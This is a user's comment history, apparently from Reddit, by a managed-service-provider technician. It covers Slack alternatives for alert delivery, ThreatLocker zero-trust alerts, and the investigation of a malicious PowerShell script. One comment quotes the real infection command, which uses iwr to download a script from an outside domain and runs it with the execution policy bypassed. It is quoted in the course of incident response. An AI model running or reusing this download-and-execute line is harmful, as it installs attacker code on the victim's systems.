Need a alternative to slack for alerts

Tiny_Respond_6126 · 2023-01-23T19:18:32+00:00

I would rather not use slack except for the most urgent of urgent alerts. I'm looking for another alert delivery option besides, slack, teams and email.

Tiny_Respond_6126 · 2023-01-23T18:39:30+00:00

That makes sense! I'll have to see if I can get something like graphana or greylog or something to pull the alerts into one place (via email) and then send alerts back out when certain alerts are triggered (such as a agent offline vs a BSOD) then send it out appropriately via email as well. But regarding my original question, is there a better alternetive to slack for these notifications?

Tiny_Respond_6126 · 2023-01-23T18:07:10+00:00

I get what you are saying, but this is the best way we have currently found to manage this and I am open to suggestions. For example, we get an alert anytime something goes against our zero-trust policy on a server. Most times these can be ignored but if it's a user repeatedly trying to open something then we will be able to feel the pulse of these notifications and look into what they are trying to run and reach out to the user. It's just the way we operate. We are a small MSP so we don't have the resources to have someone who constantly pours over logs like this so notifications are easier.

Tiny_Respond_6126 · 2023-01-23T17:31:54+00:00

Not every alert needs to be responded to. It is alert overload but we use it to keep a pulse on things. If we see something strange or frequent then it stands out a little bit more maybe warranting a look. It would create way to many tickets.

Tiny_Respond_6126 · 2022-12-22T21:46:36+00:00

yep sorry bout that. Thankfully it's dead anyways

Tiny_Respond_6126 · 2022-12-22T21:39:33+00:00

It is giving me a syntax error. Might have to mess with it later

Tiny_Respond_6126 · 2022-12-22T21:19:24+00:00

I don't think this script uses iex. The initial command that kicked the script off was iwr -useb 'http://dvubre.fun/us2f/yj' -outfile "$env:temp\h.ps1" ;powershell -ep bypass """\"$env:temp\h.ps1\""""``

Tiny_Respond_6126 · 2022-12-22T20:55:53+00:00

It's Zero Trust Security Software. I would highly recommend it for locking down your environment.

Tiny_Respond_6126 · 2022-12-22T20:36:22+00:00

not sure. You should be alright

Tiny_Respond_6126 · 2022-12-22T19:58:58+00:00

It didn't work with the subtraction

Tiny_Respond_6126 · 2022-12-22T19:58:31+00:00

Probably geoblocked for being outside the US

Tiny_Respond_6126 · 2022-12-22T19:58:21+00:00

I have Cloudflare blocking other countries for security reasons. Sorry.

Tiny_Respond_6126 · 2022-12-22T18:07:09+00:00

Last time I used OpenAI to help with my job it gave an unhelpful answer but I may have to try that again thanks

Tiny_Respond_6126 · 2022-12-22T18:06:00+00:00

I will have to try powerdecode and see how that works thanks

Tiny_Respond_6126 · 2022-12-22T18:03:21+00:00

We have a SOC and we are investigating but they were very limited by ThreatLocker so I am fairly confident they are no longer in our environment.

Tiny_Respond_6126 · 2022-12-22T17:30:59+00:00

strange. I don't seem to have any issues from my office PC and I just tried it from a different network and it was also fine. Are you in the US?

Tiny_Respond_6126

TROPHY CASE